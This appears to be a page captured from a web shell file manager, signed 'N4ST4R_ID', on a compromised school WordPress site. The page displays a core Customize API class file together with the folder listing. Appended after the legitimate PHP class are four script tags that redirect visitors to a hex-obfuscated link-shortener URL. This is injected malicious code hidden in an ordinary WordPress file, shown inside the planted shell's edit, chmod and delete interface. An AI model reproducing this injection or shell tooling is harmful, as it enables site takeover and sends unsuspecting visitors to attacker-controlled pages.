Submit
Path:
~
/
home
/
ampckwxt
/
public_html
/
smpn11bpn.sch.id
/
wp-includes
/
customize
/
File Content:
class-wp-customize-code-editor-control.php
<?php /** * Customize API: WP_Customize_Code_Editor_Control class * * @package WordPress * @subpackage Customize * @since 4.9.0 */ /** * Customize Code Editor Control class. * * @since 4.9.0 * * @see WP_Customize_Control */ class WP_Customize_Code_Editor_Control extends WP_Customize_Control { /** * Customize control type. * * @since 4.9.0 * @var string */ public $type = 'code_editor'; /** * Type of code that is being edited. * * @since 4.9.0 * @var string */ public $code_type = ''; /** * Code editor settings. * * @see wp_enqueue_code_editor() * @since 4.9.0 * @var array|false */ public $editor_settings = array(); /** * Enqueue control related scripts/styles. * * @since 4.9.0 */ public function enqueue() { $this->editor_settings = wp_enqueue_code_editor( array_merge( array( 'type' => $this->code_type, 'codemirror' => array( 'indentUnit' => 2, 'tabSize' => 2, ), ), $this->editor_settings ) ); } /** * Refresh the parameters passed to the JavaScript via JSON. * * @since 4.9.0 * * @see WP_Customize_Control::json() * * @return array Array of parameters passed to the JavaScript. */ public function json() { $json = parent::json(); $json['editor_settings'] = $this->editor_settings; $json['input_attrs'] = $this->input_attrs; return $json; } /** * Don't render the control content from PHP, as it's rendered via JS on load. * * @since 4.9.0 */ public function render_content() {} /** * Render a JS template for control display. * * @since 4.9.0 */ public function content_template() { ?> <# var elementIdPrefix = 'el' + String( Math.random() ); #> <# if ( data.label ) { #> <label for="{{ elementIdPrefix }}_editor" class="customize-control-title"> {{ data.label }} </label> <# } #> <# if ( data.description ) { #> <span class="description customize-control-description">{{{ data.description }}}</span> <# } #> <div class="customize-control-notifications-container"></div> <textarea id="{{ elementIdPrefix }}_editor" <# _.each( _.extend( { 'class': 'code' }, data.input_attrs ), function( value, key ) { #> {{{ key }}}="{{ value }}" <# }); #> ></textarea> <?php } } ob_start(); ?> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script>
Edit
Rename
Chmod
Delete
FILE
FOLDER
Name
Size
Permission
Action
admin.php
5362 bytes
0644
class-wp-customize-background-image-control.php
1970 bytes
0644
class-wp-customize-background-image-setting.php
1325 bytes
0644
class-wp-customize-background-position-control.php
3718 bytes
0644
class-wp-customize-code-editor-control.php
3003 bytes
0644
class-wp-customize-color-control.php
3752 bytes
0644
class-wp-customize-cropped-image-control.php
2145 bytes
0644
class-wp-customize-custom-css-setting.php
5974 bytes
0644
class-wp-customize-date-time-control.php
10132 bytes
0644
class-wp-customize-filter-setting.php
1274 bytes
0644
class-wp-customize-header-image-control.php
8716 bytes
0644
class-wp-customize-header-image-setting.php
2468 bytes
0644
class-wp-customize-image-control.php
1897 bytes
0644
class-wp-customize-media-control.php
10101 bytes
0644
class-wp-customize-nav-menu-auto-add-control.php
1808 bytes
0644
class-wp-customize-nav-menu-control.php
2814 bytes
0644
class-wp-customize-nav-menu-item-control.php
8843 bytes
0644
class-wp-customize-nav-menu-item-setting.php
28555 bytes
0644
class-wp-customize-nav-menu-location-control.php
2985 bytes
0644
class-wp-customize-nav-menu-locations-control.php
3503 bytes
0644
class-wp-customize-nav-menu-name-control.php
1817 bytes
0644
class-wp-customize-nav-menu-section.php
1402 bytes
0644
class-wp-customize-nav-menu-setting.php
19622 bytes
0644
class-wp-customize-nav-menus-panel.php
3995 bytes
0644
class-wp-customize-new-menu-control.php
1710 bytes
0777
class-wp-customize-new-menu-section.php
1693 bytes
0777
class-wp-customize-partial.php
11254 bytes
0644
class-wp-customize-selective-refresh.php
13754 bytes
0777
class-wp-customize-sidebar-section.php
1745 bytes
0644
class-wp-customize-site-icon-control.php
5859 bytes
0644
class-wp-customize-theme-control.php
12575 bytes
0644
class-wp-customize-themes-panel.php
4071 bytes
0644
class-wp-customize-themes-section.php
7641 bytes
0644
class-wp-customize-upload-control.php
1883 bytes
0644
class-wp-sidebar-block-editor-control.php
1372 bytes
0644
class-wp-widget-area-customize-control.php
2405 bytes
0644
class-wp-widget-form-customize-control.php
3332 bytes
0644
error_log
426 bytes
0644
index.htm
1092 bytes
0644
index.html
1092 bytes
0644
index.php
1092 bytes
0644
N4ST4R_ID | Naxtarrr